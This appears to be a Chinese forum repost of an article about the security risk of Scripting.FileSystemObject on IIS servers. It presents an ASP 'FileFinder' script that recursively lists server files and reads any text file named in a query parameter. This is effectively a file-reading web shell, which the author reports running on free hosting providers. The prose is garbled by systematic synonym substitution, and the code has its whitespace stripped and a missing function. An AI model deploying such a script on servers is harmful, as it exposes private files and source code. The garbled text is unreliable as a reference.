|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
缺点:正版成本价格贵(盗版就不说了)、不够安全,大多数服务器用windows系统,没有linux安全fso|iis|web|web服务|web服务器|平安|工具|数据scripting.filesystemobject工具是由scrrun.dll供应的很多供vbscript/jscript把持的com工具之一。scripting.filesystemobject供应了十分便当的文本文件和文件目次的会见,可是同时也对iisweb服务器数据平安形成了必定的威逼。
filefinder的代码很复杂,由3个函数和30行摆布的按次代码组成。
最关头的是findfiles函数,经由过程对它的递回挪用完成对某个目次的遍历,而且依照特定的文件扩大名来征采这些文件。
functionfindfiles(strstartfolder,strext)
dimn
dimothisfolder
dimofolders
dimofiles
dimofolder
dimofile
假如体系办理员对文件体系的权限举行仔细的设置话,上面的代码就要堕落
可是有些目次仍是能够观察的,以是我们复杂的把毛病疏忽已往
onerrorresumenext
n=0
response.write"<b>searching"&strstartfolder&"</b><br>"
setothisfolder=g_fs.getfolder(strstartfolder)
setofiles=othisfolder.files
foreachofileinofiles
假如是指定的文件扩大名,输入毗连导向自己,但用分歧的命令cmd
在这里是cmd=read,即读出指定物理路径的文本文件
ifissuffix(ofile.path,strext)then
response.write"<atarget=_blankhref=ff.asp?cmd=read&path="&server.htmlencode(ofile.path)&"><fontcolor=dodgerblue>"&ofile.path&"</font></a><br>"
iferr=0then
n=n+1
endif
endif
next
setofolders=othisfolder.subfolders
foreachofolderinofolders
n=n+findfiles(ofolder.path,strext)
next
findfiles=n
endfunction
上面的代码是对url前面的参数举行剖析:
读出各个参数的值
strcmd=ucase(request.querystring("cmd"))
strpath=request.querystring("path")
strext=request.querystring("ext")
brawdata=ucase(request.querystring("raw"))
默许搜刮.asp文件
ifstrpath=""then
strpath="."
endif
ifstrext=""then
strext=".asp"
endif
依据分歧的命令cmd实行分歧的代码
selectcasestrcmd
case"find"
response.writefindfiles(strpath,strext)&"file(s)found"
case"read"
ifbrawdata="t"then
response.writereadtextfile(strpath)
else
response.write"<pre>"&server.htmlencode(readtextfile(strpath))&"</pre>"
endif
caseelse
response.write"<h3>pleasespecifyacommandtoexecute</h3>"
endselect
从下面的剖析能够看出,假如有充足的权限的话,我们就能够经由过程filefinder来查找iisweb服务器上的恣意文本文件,而且能够轻松的观察文件内容。关于非文本文件,能够断定他们是不是存在及其地点路径,这关于初级hacker们来讲,这些信息偶然是极为主要的。
可是这些对数据平安的威逼的条件前提是实行ff.asp的用户最少具有读取目次和文件的权限。因为windowsntserver在安装后的默许平安设置是一切用户都能够“读取”目次和文件,以是不论是iis默许的你名用户iusr_servername仍是其余甚么用户,都能够顺列的读取目次和文件的信息。而年夜多半windowsntserver体系办理员次要体贴体系是不是可以运转的起来,一样平常不肯意往修改默许的目次和文件权限,究竟那样做要冒很年夜的风险,并且必要良多次得履历。以是,我们能够用filefinder来反省作为web服务器的ntserver的文件体系的平安设置是不是平安。
作者专门对作为iisweb服务器的文件体系的权限举行了野生设置,但限于没有履历,招致了很多奇异的毛病征象,如:所用的做实行的ntserver4.0不克不及举行access数据库的毗连。而在举行文件体系权限修改之前,这些功效是一般的。
本着地道研讨的目标,作者还在我所请求的收费asp空间上作了实验(包含csdn供应的我的团体主页),了局是filefinder都能够顺遂运转。而在http://www2.domaindlx.com/index.html请求的团体主页却没有这个成绩,可见这个收费asp主页供应商在这方面做的仍是对照仔细的。只管domaindlx的web服务器运转在windows2000server上的,其默许的文件体系的平安权限和nt4.0没有很年夜的不同。
因为作者的才能无限,就对这个成绩会商到这里。仅以此文来向国际的asp主页供应商供应参考定见,但愿能对供应商和客户两边的数据平安都有所匡助。
附:用别的相似的服务器端剧本来运转的web服务,假如也供应相似scripting.filesystemobject的对文件体系操纵的功效,不论甚么平台应当存在一样的成绩。
</p>由于ASP还是一种Script语言所没除了大量使用组件外,没有办法提高其工作效率。它必须面对即时编绎的时间考验,同时我们还不知其背后的组件会是一个什么样的状况; |
|